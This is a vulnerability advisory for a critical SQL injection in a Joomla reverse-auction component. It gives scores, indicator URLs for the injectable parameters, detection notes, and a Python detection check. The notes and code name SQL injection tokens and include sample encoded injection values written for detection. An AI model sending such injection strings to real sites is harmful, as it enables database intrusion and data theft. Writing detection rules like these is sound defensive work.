CVE-2018-17376
published 2018-09-28

CVE-2018-17376: SQL Injection exists in the Reverse Auction Factory 4.3.8 component for Joomla! via the filter_order_Dir, cat, or filter_letter parameter.

Priority: P265, critical
CVSS 3.0: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
EXPLOIT
EPSS: 3.21% (86.6th percentile)

Affected

1 range
Vendor | Product | Version range | Fixed in
thephpfactory | reverse_auction_factory | |

Detection & IOCs (extracted from sources)

url: http://localhost/[PATH]/index.php?option=com_rbids&task=listauctions&filter_order_Dir=[SQL]
url: http://localhost/[PATH]/index.php?option=com_rbids&task=listauctions&cat=[SQL]
url: http://localhost/[PATH]/index.php?option=com_rbids&task=categories&filter_letter=[SQL]
  • Detect HTTP requests to Joomla targeting the com_rbids component with the task=listauctions endpoint and a filter_order_Dir parameter containing SQL injection payloads (e.g. EXTRACTVALUE, CONCAT, USER(), DATABASE(), VERSION()).
  • Detect HTTP requests to Joomla targeting the com_rbids component with the task=listauctions endpoint and a cat parameter containing SQL injection payloads (e.g. error-based blind SQLi using information_schema.tables).
  • Detect HTTP requests to Joomla targeting the com_rbids component with the task=categories endpoint and a filter_letter parameter containing SQL injection payloads (e.g. AND EXTRACTVALUE with VERSION() and DATABASE()).
  • Alert on URL-encoded SQL injection strings in query parameters for option=com_rbids requests; payloads include encoded forms of EXTRACTVALUE, CONCAT, USER(), DATABASE(), VERSION(), and information_schema.tables references.
  • The exploit PoC uses localhost as the target host; in real-world attacks the [PATH] and host will vary. Detection rules must be written to match the component identifier (option=com_rbids) and vulnerable parameter names rather than the host.
  • All three SQL injection payloads are URL-encoded; WAF/IDS rules must decode percent-encoded values before pattern matching to reliably detect the attack.
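
The last two notes above, written as a check over request targets. This is an added example, not code from the advisory or the component; the function names, token list and sample requests are constructed for illustration, and the check also normalises double-encoded values, which goes one step beyond the single encoding the notes describe.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# task -> parameters the advisory names as injectable under that task
VULN_PARAMS = {
    "listauctions": ("filter_order_Dir", "cat"),
    "categories": ("filter_letter",),
}
# SQL tokens named in the detection notes, matched only after decoding
SQL_TOKENS = re.compile(
    r"extractvalue\s*\(|concat(?:_ws)?\s*\(|\b(?:user|database|version)\s*\(|information_schema",
    re.IGNORECASE,
)

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded values are normalised too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect(request_target):
    """Return [(parameter, matched token)] for a suspicious com_rbids request."""
    # parse_qsl splits on '&' first, then decodes each value once
    pairs = parse_qsl(urlsplit(request_target).query, keep_blank_values=True)
    args = dict(pairs)  # last value wins, as PHP does for repeated names
    if args.get("option") != "com_rbids":
        return []
    watched = VULN_PARAMS.get(args.get("task", ""), ())
    hits = []
    for name, value in pairs:
        match = SQL_TOKENS.search(fully_decode(value)) if name in watched else None
        if match:
            hits.append((name, match.group(0).lower()))
    return hits

def pct_all(text):
    """Encode every byte as %xx, the style the listed PoC payloads use."""
    return "".join(f"%{b:02x}" for b in text.encode())

# Constructed request targets (not from real logs); host and [PATH] are ignored
BASE = "/index.php?option=com_rbids&task="
SAMPLES = [
    BASE + "listauctions&filter_order_Dir=asc",
    BASE + "listauctions&filter_order_Dir=" + pct_all("EXTRACTVALUE(1,VERSION())"),
    BASE + "categories&filter_letter=" + pct_all(pct_all("DATABASE()")),
    "/index.php?option=com_content&task=listauctions&cat=" + pct_all("information_schema"),
]
```

A raw substring match on the third sample finds nothing, because the token only appears after two rounds of decoding; the fourth is ignored because it does not address com_rbids.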

CVSS provenance

nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P